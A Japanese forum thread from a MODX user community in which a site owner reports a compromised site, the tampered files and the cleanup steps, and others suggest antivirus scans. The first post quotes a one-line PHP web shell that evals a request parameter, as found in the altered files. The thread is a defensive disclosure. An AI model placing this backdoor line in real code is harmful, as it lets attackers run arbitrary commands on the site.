サイト改ざん被害の報告と注意喚起  【解決済み】

質問全般・改善要望
アバター
tomophy
メンバー
メンバー
記事: 58
登録日時: 2011年4月21日(木) 09:29

サイト改ざん被害の報告と注意喚起

投稿記事by tomophy » 2016年1月07日(木) 22:30

私が運営しているMODXサイトが改ざんされ、マルウェアらしき不審なコードが仕込まれていました。サーバ会社から連絡を受け、以下の対策を実行しました。未だに原因不明ですが、MODXサイトオーナーの皆さんへの注意喚起のために現象と対策を共有します。

現象
manager/includes/mod_foot.php が新たに書き込まれ、manager/includes/protect.inc.php 等のファイルが改ざんされた。

対策
まずMODXサイトにmod_foot.phpなるファイルがないか確認しましょう。もしあれば、上記3つのファイルの拡張子を.txtに書き換えてPHPが実行されないようにしておきます。古いバージョンのMODXだと、この時点でサイトにも管理画面にもアクセスできなくなります。

いくつかのPHPファイルの1行目に下記のコードがないか確認しましょう。
(同じMODXでもサイトによって改ざんされるファイルが異なります。)

コード: 全て選択

<?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>


protect.inc.phpの111~158行目に下記のコードで始まるコードがないか確認しましょう。(バックドア型マルウェアの一部かもしれないため、全コードの掲載は差し控えました。)

コード: 全て選択

function decrypt_url($encrypted_url)


上記があれば、サイト改ざんは間違いありません。直ちに、これら3つのファイルを削除しましょう。続けて、サーバの管理画面とFTPの管理画面のパスワードを書き換えます。

http://modx.jp/download/download_evo.htmlから最新のMODXのプログラムをダウンロードして、アップデートの準備をしておきます。

config.inc.php等の設定データ、assets/templates下のテンプレートデータ、content/images下の画像など自作データがローカルPCにバックアップしてあることを確認します。

最後に、FTPで改ざんされたMODXサイト全体をサーバから削除し、最新のMODXのプログラムと上記のバックアップデータをアップロードして、MODXを最新版にアップデートします。念のため、管理画面のパスワードも変更しておきましょう。

以上、ご参考まで。
最後に編集したユーザー tomophy on 2016年1月24日(日) 20:55 [ 編集 1 回目 ]
アバター
yama
管理人
記事: 3066
登録日時: 2009年7月29日(水) 02:50

Re: サイト改ざん被害の報告と注意喚起

投稿記事by yama » 2016年1月12日(火) 12:08

サイトに仕込まれたマルウェアは、パソコン用のアンチウイルスソフトで精密に検査・駆除できます。念のため、サーバ上の全ファイルをダウンロードして検査すると安心だと思います。
ガンブラー手法で感染させられることも多いので、サイト管理に用いているパソコンは念入りに検査したほうがいいかもしれません。
アバター
tomophy
メンバー
メンバー
記事: 58
登録日時: 2011年4月21日(木) 09:29

Re: サイト改ざん被害の報告と注意喚起  【解決済み】

投稿記事by tomophy » 2016年1月14日(木) 22:12

全ファイルをダウンロードしてアンチウィルスソフトでクイックスキャンをかけてみましたが、何の反応もありませんでした。
その後、フルスキャンをかけたところ、バックドア型マルウェアが検出されました。
https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Backdoor%3APHP%2FSmall.D
ご忠告いただきましてありがとうございました。
アバター
yama
管理人
記事: 3066
登録日時: 2009年7月29日(水) 02:50

サイト改ざん被害の報告と注意喚起

投稿記事by yama » 2016年2月26日(金) 16:00

protect.inc.phpを狙う事例について気になる方がいらっしゃると思いますので、こちらの件、追記です。
1.0.15Jではprotect.inc.phpを使いませんので、もし仮にまたprotect.inc.phpが改ざんされてもトラップが発動することはありません。そういう意味では多少安心かと思います(※不正侵入を許してしまっていることには違いないですが)。1.0.15Jは基本的なページ表示処理の流れで呼び出されるファイルの構成が変わっているので、既存の攻撃ノウハウがそのまま使えず、その点でもリスクが減ります。

狙う側としては、たまたまprotect.inc.phpを標的に選んだだけで、改竄候補となるファイルは他にもありますので、基本的な改竄対策は必要です。
hoya.
メンバー
メンバー
記事: 6
登録日時: 2010年2月22日(月) 20:35

サイト改ざん被害の報告と注意喚起

投稿記事by hoya. » 2016年3月23日(水) 15:07

自分の所持環境で同等の事例発生しました。
情報役に立ちました。ありがとうございます